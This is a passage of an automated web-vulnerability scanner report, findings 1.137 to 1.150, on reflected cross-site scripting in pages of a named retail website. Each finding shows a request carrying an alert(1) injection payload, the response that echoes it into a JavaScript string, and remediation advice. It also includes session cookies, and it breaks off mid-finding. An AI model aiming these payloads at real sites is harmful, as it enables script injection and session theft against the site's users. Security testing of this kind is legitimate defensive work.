<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men341fe"-alert(1)-"31db44bf19f/trousers/");
//]]>
...[SNIP]...

1.137. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3995f"-alert(1)-"a3952493b7c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/trousers3995f"-alert(1)-"a3952493b7c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=p1bt0tf99spp6ed3hjnti3frl5; expires=Tue, 09-Nov-2010 17:13:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/trousers3995f"-alert(1)-"a3952493b7c/");
//]]>
...[SNIP]...

1.138. http://www.fredperry.com/limited-edition/men/trousers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b150e"-alert(1)-"33d8408daf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/trousers/?b150e"-alert(1)-"33d8408daf3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:10:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=naj9ms4mjpgu0e5lfjm5nos3h3; expires=Tue, 09-Nov-2010 17:10:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/trousers/?b150e"-alert(1)-"33d8408daf3=1");
//]]>
...[SNIP]...

1.139. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c21cc"-alert(1)-"0ce157bdad7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc21cc"-alert(1)-"0ce157bdad7/men/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jkc6rurokln17h26i69cb11qs6; expires=Tue, 09-Nov-2010 17:14:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc21cc"-alert(1)-"0ce157bdad7/men/woven-shirts/");
//]]>
...[SNIP]...

1.140. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49a6f"-alert(1)-"250afec6fce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men49a6f"-alert(1)-"250afec6fce/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=facdjjolf3cmv5erkbtf895pi0; expires=Tue, 09-Nov-2010 17:14:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men49a6f"-alert(1)-"250afec6fce/woven-shirts/");
//]]>
...[SNIP]...

1.141. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c44"-alert(1)-"e4a400a0921 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/woven-shirtsa7c44"-alert(1)-"e4a400a0921/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=53vnpl842au915dr6l8pe40j37; expires=Tue, 09-Nov-2010 17:15:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/woven-shirtsa7c44"-alert(1)-"e4a400a0921/");
//]]>
...[SNIP]...

1.142. http://www.fredperry.com/limited-edition/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52818"-alert(1)-"864ea334664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/woven-shirts/?52818"-alert(1)-"864ea334664=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1rvit536klng9drge2lou592o2; expires=Tue, 09-Nov-2010 17:12:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/woven-shirts/?52818"-alert(1)-"864ea334664=1");
//]]>
...[SNIP]...

1.143. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f13"-alert(1)-"e0e423b9710 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc5f13"-alert(1)-"e0e423b9710/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oc7q2ucdi300denj3g419cgq85; expires=Tue, 09-Nov-2010 17:12:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc5f13"-alert(1)-"e0e423b9710/women/");
//]]>
...[SNIP]...

1.144. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e892d"-alert(1)-"71a594f2ca6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womene892d"-alert(1)-"71a594f2ca6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0j2alplcamddjnc4l2grtunqm1; expires=Tue, 09-Nov-2010 17:13:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womene892d"-alert(1)-"71a594f2ca6/");
//]]>
...[SNIP]...

1.145. http://www.fredperry.com/limited-edition/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58d36"-alert(1)-"7c51ba12963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/?58d36"-alert(1)-"7c51ba12963=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gcvi3fem1mhrbria50s6acuvk1; expires=Tue, 09-Nov-2010 17:12:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/?58d36"-alert(1)-"7c51ba12963=1");
//]]>
...[SNIP]...

1.146. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d54c5"-alert(1)-"13b1baf7e25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiond54c5"-alert(1)-"13b1baf7e25/women/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0tposdlgclqd1h58brr6uk20h6; expires=Tue, 09-Nov-2010 17:20:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiond54c5"-alert(1)-"13b1baf7e25/women/accessories/");
//]]>
...[SNIP]...

1.147. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58f2e"-alert(1)-"049337dcf29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women58f2e"-alert(1)-"049337dcf29/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=73thgc0j921t9c0heu3odub2g1; expires=Tue, 09-Nov-2010 17:20:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women58f2e"-alert(1)-"049337dcf29/accessories/");
//]]>
...[SNIP]...

1.148. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6a85"-alert(1)-"300d6ce8743 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/accessoriese6a85"-alert(1)-"300d6ce8743/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s5epv4r4i2sttp44o9n4suh513; expires=Tue, 09-Nov-2010 17:21:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/accessoriese6a85"-alert(1)-"300d6ce8743/");
//]]>
...[SNIP]...

1.149. http://www.fredperry.com/limited-edition/women/accessories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31709"-alert(1)-"d269657da44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/accessories/?31709"-alert(1)-"d269657da44=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hr77dp20kva6vnl2ndq6nniuq1; expires=Tue, 09-Nov-2010 17:18:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/accessories/?31709"-alert(1)-"d269657da44=1");
//]]>
...[SNIP]...

1.150. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a422"-alert(1)-"8f681c0c66b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

